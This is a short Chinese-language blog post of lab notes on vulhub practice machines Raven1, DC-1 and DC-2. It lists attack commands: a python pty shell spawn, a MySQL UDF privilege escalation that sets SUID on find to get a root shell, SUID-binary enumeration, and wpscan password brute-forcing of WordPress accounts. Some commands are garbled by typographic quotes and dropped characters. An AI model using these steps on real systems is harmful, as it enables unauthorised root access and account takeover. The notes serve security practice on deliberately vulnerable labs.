iloveflag-blog

vulhub-learning

字数统计: 224阅读时长: 1 min
2019/05/23 Share

Raven1

1.利用python打开一个shell终端:
sudo python -c ‘import pty;pty.spawn(“/bin/bash”)’
3.udf提取
gcc -g -c 1518.c
gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.o -lc
create table foo(line blob);
insert into foo values(load_file(‘/var/www/html/1518.so’));
select from foo into dumpfile ‘/usr/lib/mysql/plugin/1518.so’;
create function do_system returns integer soname ‘1518.so’;
select
from mysql.func;
select do_system(‘chmod u+s /usr/bin/find’);
回到终端用find命令提权:
touch foo
find foo -exec ‘/bin/sh’ \;

DC-1

1.快速找包含flag的文件
find / -name “flag“ 2>/dev/null
2>/dev/null的意思为隐藏错误信息
2.利用find命令找到有权限的二进制文件
find / -perm -4000 2> /dev/null

DC-2

nmap 扫描发现只有80端口开着,是wordpress框架
wpscan扫描得到三个用户,用字典爆破无果
发现提示cewl,通过搜集网站关键字生成字典
然后wpscan爆破得到帐号密码
wpscan —url http://dc-2 -e u -P password.txt

CATALOG
  1. 1. Raven1
  2. 2. DC-1
  3. 3. DC-2